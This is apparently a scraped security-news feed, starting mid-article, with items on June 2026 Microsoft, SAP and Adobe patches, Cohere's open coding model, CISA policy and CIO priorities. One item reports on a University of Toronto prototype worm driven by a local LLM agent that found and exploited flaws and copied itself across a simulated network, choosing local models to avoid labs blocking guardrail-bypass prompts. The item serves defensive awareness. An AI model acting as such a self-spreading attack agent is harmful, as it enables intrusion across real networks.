<p>According to <a href="https://www.linkedin.com/in/nirwan-dogra-11a24047/" target="_blank" rel="noreferrer noopener">Nirwan Dogra</a>, a Senior Software Engineer at Microsoft Security, May and June 2026 represent a new norm that will challenge traditional, slower test-and-deploy patching.</p>



<p>“The 200+ CVE count isn’t an anomaly. It’s the new baseline. AI-assisted vulnerability discovery (fuzzing, static analysis, variant hunting) is compressing the timeline between ‘a bug exists’ and ‘bug is found’ dramatically,” he said via email.</p>



<p>Ominously, according to Dogra, AI tools used were also resulting in more flaws being uncovered in components previous seen as too complex for manual audit such as hypervisor code and Kerberos. He recommended that organizations move towards risk-based vulnerability prioritization, automated patching pipelines, and a focus on the flaws that were likely to be exploited.</p>



<p><a href="https://www.linkedin.com/in/dustincchilds/" target="_blank" rel="noreferrer noopener">Dustin Childs</a>, Head of Threat Awareness for TrendAI’s Zero Day Initiative (ZDI) agreed: “We are heading into a high-stakes summer for cybersecurity. June’s record-shattering drop of 210 Microsoft vulnerabilities is a stark warning that AI is supercharging flaw discovery at an uncontrollable scale,” he said.</p>



<h2 class="wp-block-heading">Microsoft’s high-priority fixes</h2>



<p>Three vulnerabilities are rated as zero days because they have been publicly disclosed. Two are connected to adversarial disclosures affecting Windows by the researcher <a href="https://www.csoonline.com/article/4178869/microsoft-and-security-researchers-dueling-posts-about-cybersecurity-disclosures-get-nasty.html">Nightmare Eclipse</a> which have attracted a lot of attention: <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-45586" target="_blank" rel="noreferrer noopener">CVE-2026-45586</a> (CTFMON) and <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-50507" target="_blank" rel="noreferrer noopener">CVE-2026-50507</a> (BitLocker bypass). The third is <a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-49160" target="_blank" rel="noreferrer noopener">CVE-2026-49160</a>, a CVSS 7.8-rated denial of service zero day vulnerability in the Windows HTTP Protocol Stack used by various Windows services.</p>



<p>Security teams should also note the patch for <a href="https://nvd.nist.gov/vuln/detail/CVE-2026-42897" target="_blank" rel="noreferrer noopener">CVE-2026-42897</a>, an Exchange Server flaw under active exploitation <a href="https://techcommunity.microsoft.com/blog/exchange/released-june-2026-exchange-server-security-updates/4524491" target="_blank" rel="noreferrer noopener">originally disclosed</a> in May. This was originally addressed using workarounds but has now been patched.</p>



<p>The list of 15 vulnerabilities where exploitation is said to be “more likely” is headlined by <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47291" target="_blank" rel="noreferrer noopener">CVE-2026-47291</a>, a dangerous CVSS 9.8-rated kernel-level RCE flaw in http.sys that attackers could use to target multiple important enterprise applications, for IIS, WinRM, or Windows Admin Center.</p>



<p>Also worth paying attention to are a series of ‘high’ rated Hyper-V VM escape flaws, <a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-47652" target="_blank" rel="noreferrer noopener">CVE-2026-47652</a>, <a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-45641" target="_blank" rel="noreferrer noopener">CVE-2026-45641</a>, and <a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-45607" target="_blank" rel="noreferrer noopener">CVE-2026-45607</a>. Anyone running on-premises networks will also be interested in <a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-47288" target="_blank" rel="noreferrer noopener">CVE-2026-47288</a>, an RCE affecting the Active Directory Kerberos core, and <a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-45648" target="_blank" rel="noreferrer noopener">CVE-2026-45648</a>, a CVSS 8.8 affecting Active Directory Domain Services (AD DS).</p>



<h2 class="wp-block-heading">Four critical SAP vulnerabilities</h2>



<p>SAP’s Security Patch Day haul <a href="https://support.sap.com/en/my-support/knowledge-base/security-notes-news/june-2026.html" target="_blank" rel="noreferrer noopener">for June</a> comprises 15 patches across a range of core enterprise products including, prominently, NetWeaver, Commerce Cloud, SAP S/4HANA, and the Business Objects Business Intelligence Platform.</p>



<p>Four of these are rated ‘critical’, the most eye-catching of which is <a href="https://www.cve.org/CVERecord?id=CVE-2026-27671" target="_blank" rel="noreferrer noopener">CVE-2026-27671</a>, a CVSS 9.8 memory corruption vulnerability in Application Server ABAP and ABAP Platform. The problem here, said <a href="https://pathlock.com/author/jonathan-stross/" target="_blank" rel="noreferrer noopener">Jonathan Stross</a>, SAP security analyst at security company Pathlock, is that it “requires no authentication and can affect confidentiality, integrity, and availability at the same time. A successful exploit can undermine the trustworthiness of the entire ABAP instance and everything connected to it.”</p>



<p>“This is one of the most serious notes in the batch because the attack requires no authentication and can affect confidentiality, integrity, and availability at the same time. A successful exploit can undermine the trustworthiness of the entire ABAP instance and everything connected to it.</p>



<p>Not far behind it is <a href="https://www.cve.org/CVERecord?id=CVE-2026-44748" target="_blank" rel="noreferrer noopener">CVE-2026-44748</a>, a CVSS 9.9 XML Signature Wrapping in SAML Authentication vulnerability in the SAP NetWeaver Application Server ABAP and ABAP Platform. This allows authenticated attacker with low-level user privileges to capture a signed SAML message and modify and submit an XML payload with a forged identity data.</p>



<p>The final critical-rated flaws are <a href="https://www.cve.org/CVERecord?id=CVE-2026-22732" target="_blank" rel="noreferrer noopener">CVE-2026-22732</a>, a CVSS 9.1 Spring Security weakness within SAP Commerce Cloud and SAP Data Hub, and <a href="https://www.cve.org/CVERecord?id=CVE-2026-40128" target="_blank" rel="noreferrer noopener">CVE-2026-40128</a>, a CVSS 9.0 directory traversal vulnerability in the Application Server Java (Web Container).</p>



<p>This month’s update also patches two vulnerabilities marked ‘high’, the CVSS 7.4 <a href="https://www.cve.org/CVERecord?id=CVE-2026-29145" target="_blank" rel="noreferrer noopener">CVE-2026-29145</a>, addressing multiple weaknesses in Apache Tomcat within SAP Commerce Cloud, and <a href="https://www.cve.org/CVERecord?id=CVE-2026-44751" target="_blank" rel="noreferrer noopener">CVE-2026-44751</a>, a missing authorization check affecting Application Server ABAP of SAP NetWeaver and ABAP Platform.</p>



<h2 class="wp-block-heading">Adobe patches enterprise vulnerabilities</h2>



<p>Adobe’s June update addresses 123 vulnerabilities across Reader, ColdFusion, Experience Manager Forms, InDesign, InCopy, Substance 3D Sampler, Content Credentials SDK, Dreamweaver, Format Plugins, and Adobe Campaign Classic.</p>



<p>Of note are the two CVSS 10-rated CVEs (<a href="https://helpx.adobe.com/security/products/campaign/apsb26-66.html" target="_blank" rel="noreferrer noopener">APSB26-66</a>) in the Adobe Campaign Classic enterprise marketing platform, the seven mostly ‘critical’ or ‘high’-rated CVEs affecting ColdFusion (<a href="https://helpx.adobe.com/security/products/coldfusion/apsb26-64.html" target="_blank" rel="noreferrer noopener">APSB26-64</a>), and a total of 20 CVEs affecting Reader (<a href="https://helpx.adobe.com/security/products/acrobat/apsb26-63.html" target="_blank" rel="noreferrer noopener">APSB26-63</a>). It’s also a busy month for InDesign, which features 12 vulnerabilities (<a href="https://helpx.adobe.com/security/products/indesign/apsb26-58.html" target="_blank" rel="noreferrer noopener">APSB26-58</a>), and Experience Manager which features three (<a href="https://helpx.adobe.com/security/products/aem-forms/apsb26-57.html">AP</a><a href="https://helpx.adobe.com/security/products/aem-forms/apsb26-57.html" target="_blank" rel="noreferrer noopener">S</a><a href="https://helpx.adobe.com/security/products/aem-forms/apsb26-57.html">B26-57</a>).</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The politicisation of Silicon Valley]]></title>
<description><![CDATA[Former UK deputy prime minister Nick Clegg speaks about his tenure at Meta and how the tech giants have turned to Maga]]></description>
<link>https://tsecurity.de/de/3586695/it-nachrichten/the-politicisation-of-silicon-valley/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3586695/it-nachrichten/the-politicisation-of-silicon-valley/</guid>
<pubDate>Wed, 10 Jun 2026 08:50:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Former UK deputy prime minister Nick Clegg speaks about his tenure at Meta and how the tech giants have turned to Maga]]></content:encoded>
</item>
<item>
<title><![CDATA[Cohere open-sources a coding agent that runs on a single H100]]></title>
<description><![CDATA[Engineering teams building agentic coding pipelines now have a concrete open-source alternative to managed models like Claude Fable 5 — one that runs on a single H100. The tradeoff: Cohere's North Mini Code, which launched Tuesday, generated three times the output tokens of comparable models in i...]]></description>
<link>https://tsecurity.de/de/3586109/it-nachrichten/cohere-open-sources-a-coding-agent-that-runs-on-a-single-h100/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3586109/it-nachrichten/cohere-open-sources-a-coding-agent-that-runs-on-a-single-h100/</guid>
<pubDate>Wed, 10 Jun 2026 00:32:34 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Engineering teams building agentic coding pipelines now have a concrete open-source alternative to managed models like <a href="https://venturebeat.com/technology/anthropic-brings-mythos-to-the-masses-with-claude-fable-5-its-most-powerful-generally-available-model-ever">Claude Fable 5</a> — one that runs on a single H100. The tradeoff: Cohere's North Mini Code, which launched Tuesday, generated three times the output tokens of comparable models in independent testing, a verbosity cost that compounds in high-volume production workloads.</p><p>The new open-source model is a 30 billion parameter mixture-of-experts (MoE) model with 3 billion parameters active per token, built for agentic software engineering including sub-agent orchestration, architecture mapping, code review and terminal work. The model supports a 256,000 token context window with a 64,000 token maximum generation length, and is available on<a href="https://huggingface.co/CohereLabs/North-Mini-Code-1.0"> Hugging Face</a> under an Apache 2.0 license.</p><h2>What North Mini Code can do</h2><p>North Mini Code targets the full agentic coding stack. Here is what the model does and what it runs on.</p><p><b>Software engineering.</b> Cohere built North Mini Code specifically for agentic software engineering, not adapted from a general-purpose base. It has integrated tool-use capabilities and supports interleaved thinking, which Cohere says improves performance across multi-step agentic work.</p><p><b>Architecture mapping and code review.</b> North Mini Code can analyze and map systems architecture, surface dependencies and perform code review across large codebases. With a 256,000 token context window, it can hold substantial multi-file projects in a single context pass.</p><p><b>Terminal-based agentic task</b>s. The model is trained for terminal environments, handling shell interactions, package scripts and command-line tooling. Cohere benchmarked it on Terminal-Bench v2, which tests agents in real terminal environments rather than synthetic code generation tasks.</p><h2>How it was built</h2><p>North Mini Code is a sparse mixture-of-experts model with 128 experts, of which 8 activate per token. The compute requirement at inference time is closer to a 3 billion parameter model despite 30 billion total parameters. Nick Frosst, co-founder of Cohere, <a href="https://x.com/cohere/status/2064378058329526556">demoed it running on a Mac Studio</a> via MLX at around 20 gigabytes of RAM, the same machine he uses for his own local coding work.</p><p>Cohere trained the model through two stages of supervised fine-tuning followed by reinforcement learning with verifiable rewards across more than 70,000 verifiable tasks spanning approximately 5,000 repositories, deduplicated against SWE-Bench. </p><p>Rather than optimizing against a single agent scaffold, Cohere trained across three. SWE-Agent uses a rich CLI with specialized commands. Mini-SWE-Agent uses a single bash tool with raw shell output. OpenCode uses individually typed tools returning structured JSON. Cohere reports a 10 percentage point gain on OpenCode evaluation from the multi-harness approach while maintaining SWE-Agent performance.</p><h2>Where it fits</h2><p>North Mini Code enters a market that now includes Mistral Devstral Small 2, GitHub Copilot, Cursor, and Claude Fable 5 — each with distinct cost and deployment tradeoffs.</p><p>Cohere's primary benchmark comparison is against<a href="https://venturebeat.com/ai/mistral-launches-powerful-devstral-2-coding-model-including-open-source"> Mistral Devstral Small 2</a>, a 24 billion parameter dense model. In vendor-reported internal tests, Cohere claims 2.8x higher output throughput and a 30% inter-token latency advantage over Devstral Small 2 in internal tests under identical hardware configurations. Cohere also claims, in its<a href="https://huggingface.co/blog/CohereLabs/introducing-north-mini-code"> Hugging Face technical post</a>, that North Mini Code outperforms open-source models up to four times its parameter count on its reported benchmarks, including models at 120 billion parameters. </p><p><a href="https://artificialanalysis.ai/models/north-mini-code">Artificial Analysis</a> independently ranks it eighth of 127 comparable open-weight models on output speed at 210 tokens per second, with a time to first token of 0.25 second against a class median of 1.95 seconds. It places 18th of 127 on the Artificial Analysis Intelligence Index. One flag from the same data: the model generated 75 million output tokens to complete the Intelligence Index against a class median of 25 million. In high-volume agentic pipelines, that verbosity compounds into inference cost and latency.</p><p>"Suddenly people are thinking like hey, am I getting enough economic value out of the tokens from a model?" Frosst said during the launch video. "Local deployment is one way of empowering people and making AI really something that works for them."</p><p>GitHub Copilot, Cursor and Claude Code operate on per-usage or subscription pricing with no on-premises option. Anthropic's Claude Fable 5, now the most capable publicly available managed coding model, runs at $50 per million output tokens. For Frosst, the model is the polar opposite of Fable.</p><p>"Its small, cost effective, apache 2.0, and locally deployable. This is the way LLMs should go. small, open source, transparent and sovereign, vs large, expensive, proprietary and hegemonic," Frosst wrote in a<a href="https://x.com/nickfrosst/status/2064396337404096809?s=20"> post on X</a>.</p><div></div><h2>What this means for enterprises</h2><p>For teams building production agentic coding pipelines, North Mini Code's release clarifies a set of decisions that have been forming for months.</p><p><b>Purpose-built agentic training is now a baseline to evaluate against.</b> The distinction between models fine-tuned for code and models trained specifically for agentic workflows, with verified tool calls and multi-harness robustness, is now a material factor in pipeline decisions. Any model vendor claiming agentic coding capability should be able to answer whether its training used verifiable agentic tasks or was adapted from a general-purpose base.</p><p><b>Verbosity is a hidden pipeline cost that benchmarks do not surface.</b> Artificial Analysis measured North Mini Code generating three times the output tokens of comparable models. That verbosity compounds across inference cost and latency in high-volume pipelines. Throughput testing against actual workload volume is the evaluation step the benchmark rankings skip.</p><p><b>The frontier pricing split is now a real architectural decision.</b> Fable 5 at $50 per million output tokens and North Mini Code on a single H100 represent a genuine tradeoff between cost control and data residency on one side, and managed infrastructure overhead on the other. Teams running high-volume agentic coding pipelines should model both cost paths against their actual workload before committing to either.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CISA is rethinking how it prioritizes risks and vulnerabilities for feds, private sector]]></title>
<description><![CDATA[Acting director Nick Andersen said a binding operational directive is en route for agencies, and that more specific discussions need to happen with critical infrastructure owners.
The post CISA is rethinking how it prioritizes risks and vulnerabilities for feds, private sector appeared first on C...]]></description>
<link>https://tsecurity.de/de/3585188/it-security-nachrichten/cisa-is-rethinking-how-it-prioritizes-risks-and-vulnerabilities-for-feds-private-sector/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3585188/it-security-nachrichten/cisa-is-rethinking-how-it-prioritizes-risks-and-vulnerabilities-for-feds-private-sector/</guid>
<pubDate>Tue, 09 Jun 2026 18:38:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Acting director Nick Andersen said a binding operational directive is en route for agencies, and that more specific discussions need to happen with critical infrastructure owners.</p>
<p>The post <a href="https://cyberscoop.com/cisa-cyber-risk-prioritization-vulnerability-directive/">CISA is rethinking how it prioritizes risks and vulnerabilities for feds, private sector</a> appeared first on <a href="https://cyberscoop.com/">CyberScoop</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[All signs point to Trump pushing AI growth]]></title>
<description><![CDATA[Also: Anthropic advocates for a ‘pause’ on AI advancement – days after filing to go public on the US stock marketHello, and welcome to TechScape. I’m your host, Blake Montgomery, the US tech editor at the Guardian. Today we’re discussing Donald Trump’s neediness for AI and the contradictions of A...]]></description>
<link>https://tsecurity.de/de/3584653/ai-nachrichten/all-signs-point-to-trump-pushing-ai-growth/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3584653/ai-nachrichten/all-signs-point-to-trump-pushing-ai-growth/</guid>
<pubDate>Tue, 09 Jun 2026 15:18:36 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Also: Anthropic advocates for a ‘pause’ on AI advancement – days after filing to go public on the US stock market</p><p>Hello, and welcome to TechScape. I’m your host, Blake Montgomery, the US tech editor at the Guardian. Today we’re discussing Donald Trump’s neediness for AI and the contradictions of Anthropic’s safety-first posture.</p><p><a href="https://www.theguardian.com/technology/2026/jun/08/openai-ipo-files-for-public-stock-market">OpenAI confidentially files for initial public offering on US stock market</a></p><p><a href="https://www.theguardian.com/technology/2026/jun/08/apple-debuts-siri-ai-child-safety-features-wwdc">Apple debuts revamped ‘Siri AI’ and new child safety features for iPhones and iPads</a></p><p><a href="https://www.theguardian.com/commentisfree/2026/jun/08/the-guardian-view-on-children-and-the-internet-rolling-back-big-techs-untrammelled-power">The Guardian view on children and the internet: rolling back big tech’s untrammelled power | Editorial</a></p><p><a href="https://www.theguardian.com/politics/2026/jun/08/silicon-valley-meta-maga-politics-nick-clegg">Silicon Valley including Meta has embraced Maga politics, says Nick Clegg</a></p><p><a href="https://www.theguardian.com/commentisfree/2026/jun/08/bernie-sanders-ai-sovereign-wealth-fund-plan">Bernie Sanders’ AI sovereign wealth fund plan is good. But we think this is better | Nathan E Sanders and Bruce Schneier</a></p><p><a href="https://www.theguardian.com/us-news/2026/jun/08/datacenter-ai-drought-water">Majority of US’s new AI datacenters to be built on drought-hit land</a></p><p><a href="https://www.theguardian.com/technology/2026/jun/07/billions-spent-hypothetical-returns-the-ai-boom-explained-with-six-charts">Billions spent and hypothetical returns: the AI boom explained with six charts</a></p><p><a href="https://www.theguardian.com/technology/2026/jun/07/anti-ai-tech-extremism-violence">‘A driver of political violence’: how the breakneck AI boom is fueling anti-tech extremism</a></p> <a href="https://www.theguardian.com/technology/2026/jun/08/trump-ai-growth-anthropic">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI worm prototype shows attackers don’t need Mythos to take over your network]]></title>
<description><![CDATA[Researchers from the University of Toronto developed a computer worm prototype powered by an AI agent that successfully self-replicated to different systems within a simulated computer network. The worm used a free large language model (LLM) running on local hardware and exploited a combination o...]]></description>
<link>https://tsecurity.de/de/3583930/it-security-nachrichten/ai-worm-prototype-shows-attackers-dont-need-mythos-to-take-over-your-network/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3583930/it-security-nachrichten/ai-worm-prototype-shows-attackers-dont-need-mythos-to-take-over-your-network/</guid>
<pubDate>Tue, 09 Jun 2026 11:08:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Researchers from the University of Toronto developed a computer worm prototype powered by an AI agent that successfully self-replicated to different systems within a simulated computer network. The worm used a free large language model (LLM) running on local hardware and exploited a combination of older and new vulnerabilities, as well as misconfigurations that remain all too common in enterprise environments.</p>



<p>At a time when CISOs and the security industry are <a href="https://www.csoonline.com/article/4158117/anthropics-mythos-signals-a-structural-cybersecurity-shift.html">concerned about the ability of frontier models such as Anthropic’s Mythos</a> to find zero-day vulnerabilities in critical software, this experiment is a reminder that attackers don’t need cutting-edge AI to wreak havoc across typical corporate networks. In fact, using paid models accessible only via APIs would be a point of failure for an autonomous malicious system like a computer worm, because prompts constructed to bypass safety guardrails would quickly be detected and blocked by the AI labs.</p>



<p>“We discovered that it is possible to create an AI-driven computer worm, using only small, free AI models, that can autonomously identify each machine’s unique weak points (including vulnerabilities just reported by industry and misconfigurations such as reused passwords) and exploit them, hijacking computing power to take over regular devices such as laptops, cameras, and everything else online, and then copying itself onto servers and networks to either steal data or launch new attacks,” the research team from the University of Toronto’s CleverHans Lab said in <a href="https://cleverhans.io/latest-research.html">their report</a>. “We did this without using the newest, most powerful AI models. There is no single defence against this new threat.”</p>



<p>Building an agentic harness for offensive cyberattacks</p>



<p>While frontier models such as Claude Opus and GPT 5.5 offer million-token context windows and can reason for tens of minutes and even hours at a time to solve a single task, this approach does not work for locally hosted LLMs running on a single GPU. Their context windows are much smaller and generally exhibit weaker instruction-following abilities for agentic tasks.</p>



<p>Vibe-coding software developers who encountered these problems long ago have solved them by building custom harnesses and agentic frameworks that split complex software engineering projects into phases and steps, executed by multiple sub-agents in parallel that share results via some form of memory system, ranging from a markdown file to a database.</p>



<p>The CleverHans Lab researchers adopted those lessons to build their own harness for offensive security purposes to compensate for local LLM limitations, complete with phases and task-specific nodes that make LLM calls with specialized prompts.</p>



<p>“This core is supported by complementary systems: a hierarchical memory that preserves discoveries across independent LLM calls, tools and their handlers that encapsulate common action sequences and interpret execution results, a skill system that injects context-aware pentesting guidance on demand, and multi-agent coordination that shares intelligence across instances,” they explained in <a href="https://arxiv.org/html/2606.03811v1">their paper</a>.</p>



<p>Agentic harnesses built for security research and penetration testing are not a new concept and have existed for a while. Open-source examples include <a href="http://github.com/gadievron/raptor">RAPTOR</a>, a framework of skills and agents for Claude Code designed for vulnerability discovery and exploit writing, and <a href="https://github.com/AgentSecOps/SecOpsAgentKit">SecOpsAgentKit</a>.</p>



<p>“Previous models can perform close to, at, or beyond Mythos levels depending on capability by using harnesses,” <a href="https://www.linkedin.com/in/gadievron/">Gadi Evron</a>, CEO of AI security firm Knostic and one of the creators of RAPTOR, told CSO. “When new models come out, they can achieve in a prompt what previously took a harness, at which point new harnesses are built, and so on and so forth.”</p>



<h2 class="wp-block-heading">Simulating a vulnerable enterprise network</h2>



<p>The CleverHans Lab researchers created a network made up of virtual machines running different operating systems including Ubuntu (16.04-24.04), Debian (9-12), Alpine Linux, Rocky Linux 9, CentOS Stream 9, and Windows Server (2008 R2, 2019, 2022). These VMs simulated servers running a variety of web services, as well as IoT devices and industrial control systems that can be found on typical corporate networks.</p>



<p>The researchers left an assortment of old and new — a few days old — vulnerabilities unpatched on the simulated systems, as well as common insecure configurations and generic flaws such as missing access control or SQL injection. The goal was to test the capability of their AI-powered worm to discover the systems, find the open ports, identify the exposed services, locate the vulnerabilities, exploit them, and then copy itself to the compromised system.</p>



<p>The systems had both remotely exploitable flaws that would provide initial access, as well as local flaws and weaknesses that could be used to elevate the privileges to root and completely take over the machine.</p>



<p>“These two classes evaluate complementary capabilities: CVEs test the agent’s ability to fingerprint software versions and dynamically adapt or compile raw exploit code to fit the target environment, whereas CWEs probe its capacity for open-ended, target-specific reasoning where no off-the-shelf exploit applies,” the researchers said. “To ensure the network reflects vulnerabilities encountered in the real-world, all targets are drawn from three authoritative threat taxonomies [the CISA Known Exploited Vulnerabilities catalog, the OWASP Top 10: 2025, and the MITRE ATT&amp;CK framework] covering, respectively, vulnerabilities under active exploitation in the wild, prevalent web and software vulnerabilities, and adversarial techniques used after initial access to a network.”</p>



<p>Furthermore, some virtual machines were equipped with GPUs that would allow the worm to replicate itself and then hijack the computing resources to run the model locally instead of relying on the LLM hosted by the researchers on an external system.</p>



<p>Over the course of seven days and five generations of self-replication, the worm managed to spread to 27 of the 33 systems in the simulated environment. The worm correctly identified the vulnerabilities in 82% of the attempts and managed successful exploitation in 44% of those. Despite the exploitation rate being quite low, the parallel and swarm-like implementation where every compromised system became a new instance of the malicious agent, compensated and eventually led to an overall high success rate.</p>



<p>This largely matches what security researchers from Forescout found in <a href="https://www.forescout.com/blog/ai-security-testing-agents-leap-from-assistants-to-autonomous-hackers/">a study</a> performed earlier this year that looked at how good models have become at discovering and exploiting vulnerabilities. While the research showed that the new generation of open-weight models had significantly improved their capabilities of both finding and exploiting vulnerabilities, the smaller variants of those models quantized to run locally on single-GPUs still performed poorly at such tasks.</p>



<p>The researchers noted at the time, however, that by using specialized AI agentic frameworks like RAPTOR they were able to find new zero-days in OpenDNS.</p>



<p>“Many of the open-source or generally commercially available models are already good enough that if used with the correct harness they can find vulnerabilities, exploit them, create malicious code and so on,” <a href="https://www.linkedin.com/in/danielricardosantos/">Daniel dos Santos</a>, VP of research at Forescout, told CSO. “The new work from U of Toronto shows that similar models can also be used to create dynamically adapting worms.”</p>



<p>Cybercriminals are aware of these advances in model capabilities too based on discussions Dos Santos’ team observed on underground forums, with more attackers focusing on open-source and commercial models instead of “underground” ones fine-tuned for cybercrime.</p>



<h2 class="wp-block-heading">Organizations running out of time</h2>



<p>While zero-day attacks receive a lot of attention and AI has put such flaws within the reach of more attackers than ever, the reality is that there is no shortage of systems on the internet and inside networks that are either misconfigured or vulnerable to known flaws for which patches or mitigations exist.</p>



<p>The University of Toronto experiment shows that defenders need to be able to respond with similar speed, especially since their prototype shows that knowledge about new vulnerabilities can be integrated into the worm’s knowledge base within hours of public disclosure. The ability of the worm to hijack GPUs to run nodes further decreases the investment attackers need to make in running such AI-assisted attacks.</p>



<p>“Organizations have endless technology and security debt, and with AI attacks on the rise, we no longer have time,” Evron said. “Change however is all about time, especially in the enterprise. The key is to start preparing right now. Soon, we won’t measure time to exploitation, but will need to construct new measurements, such as for the ability to handle regularly occurring, concurrent data breaches while minimizing impact on daily operations.”</p>



<p>University of Toronto researchers call for enterprises to adopt AI-assisted penetration testing and fuzzing to discover exploitable weaknesses in their own infrastructure, but also to build the capability to deploy patches or mitigations faster, which is now a significant gap.</p>



<p>They do, however, acknowledge some limitations of their prototype, such as the fact that it was noisy, leaving many behavioral signatures behind that could be detected by endpoint and network monitoring systems. Also their simulated network lacked basic network segmentation, which could be further improved with zero-trust architecture to prevent lateral movement and by minimizing the software dependencies and attack surface on every host system.</p>



<p>“While vulnerabilities, exploits, and attack orchestration are now autonomous, the deeper meaning for defense is that many of our assumptions about building security programs are now challenged,” Evron said. “Until we get to mature defensive AI, we must empower our people with coding agents to bring them up to machine speed, and then defend these agents in turn.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The 12 most strategically important IT initiatives today]]></title>
<description><![CDATA[The strategic initiatives for Rajeev Khanna, CIO at insurance brokerage Trucordia, mirror those of most CIOs, with implementing AI throughout the organization at the top of the list.



But Khanna also includes cybersecurity, data and analytics projects, and innovation work as strategic prioritie...]]></description>
<link>https://tsecurity.de/de/3581056/it-nachrichten/the-12-most-strategically-important-it-initiatives-today/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581056/it-nachrichten/the-12-most-strategically-important-it-initiatives-today/</guid>
<pubDate>Mon, 08 Jun 2026 12:18:06 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The strategic initiatives for <a href="https://www.linkedin.com/in/rajeevkhanna1/" rel="nofollow">Rajeev Khanna</a>, CIO at insurance brokerage Trucordia, mirror those of most CIOs, with implementing AI throughout the organization at the top of the list.</p>



<p>But Khanna also includes cybersecurity, data and analytics projects, and innovation work as strategic priorities, saying they’re “all things we’re working on in parallel.”</p>



<p>While none of those initiatives stands out as unique, Khanna knows he can’t follow generic project templates or work toward vague objectives in any of those areas.</p>



<p>Rather, he’s using automation and AI to make his company’s workflows more efficient. He’s using technology to better serve Trucordia’s specific customer needs. And he’s enabling new products and services to differentiate the company in the market and fuel growth.</p>



<p>“Technology,” he adds, “is enabling business innovation and speed of delivery.”</p>



<p>Khanna’s strategic priorities — and the goals they’re meant to achieve — are representative of what <a href="https://us.resources.cio.com/resources/state-of-the-cio/" rel="nofollow">CIO.com’s State of the CIO survey</a> found to be the key strategic initiatives for IT today.</p>



<p>When asked to list their most strategically important technology initiatives, CIOs put generative AI at the top, followed by agentic AI and then data/business analytics.</p>



<p>Security/risk management and automation of IT and business processes round out the top five.</p>



<p>Farther down the list are the more conventional IT tasks, such as modernization efforts, cloud management, and developing applications for and migrating applications to the cloud.</p>



<p>CIOs, executive advisers, and IT analysts say IT’s list of strategic initiatives shows how tech execs are spending more energy shaping and enabling their organizations’ strategies and desired business outcomes — and focusing less on technology excellence as their primary objective.</p>



<p>“CIOs are spearheading the IT architecture, organizational structures, and process transformation necessary to drive adoption and business value at enterprise scale,” the State of the CIO survey found.</p>



<p>Such shifts underscore the ongoing evolution of the CIO role from operational order-taker to transformation leader, with CIOs actively engaged with business leaders to drive AI adoption and focus on high-value outcomes from all technology initiatives.</p>



<p>How CIOs are spending their time in 2026 reflects this, with the study finding that CIOs are devoting more time to working more closely with business leaders on potential AI initiatives, learning about emerging tech, and creating a framework and organizational structure to support AI initiatives. Compared to last year, they’ve cut back on negotiating with IT vendors, managing IT crises, controlling costs, and managing expenses.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/05/slide39-Top-12-Strategic-Initiatives-State-of-the-CIO-2026-1.jpg?quality=50&amp;strip=all&amp;w=1024" alt="State of the CIO 2026 - Top 12 Strategic Initiatives (slide 39)" class="wp-image-4178311" width="1024" height="475" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">CIO.com / Foundry</p></div>



<h2 class="wp-block-heading">Tech enables new capabilities, products</h2>



<p>Khanna’s focus reflects those findings. He’s prioritizing “new capabilities for the organization that are more differentiating and creating and launching new capabilities and products for clients in a more efficient way and at a faster pace,” he says — often through use of AI.</p>



<p>He’s also prioritizing projects that leverage data and analytics “to serve clients better and deliver products that fit market needs.” That includes, for example, incorporating large language models (LLMs) into analytics tools so that users can interrogate data using natural language.</p>



<p>And he’s doing all that with “cyber always top of mind” — a perennial task that requires constant attention.</p>



<p>“Given that cyber is a moving target, we need to work at staying current, modernizing, and staying ahead of the curve on what the bad actors are doing,” Khanna says. “That’s going to be a forever, ongoing focus.”</p>



<h2 class="wp-block-heading">Scaling AI is the goal</h2>



<p><a href="https://www.linkedin.com/in/nicknadgauda/" rel="nofollow">Nick Nadgauda</a>, global CIO at MetLife, similarly speaks about IT’s strategic initiatives as a business driver.</p>



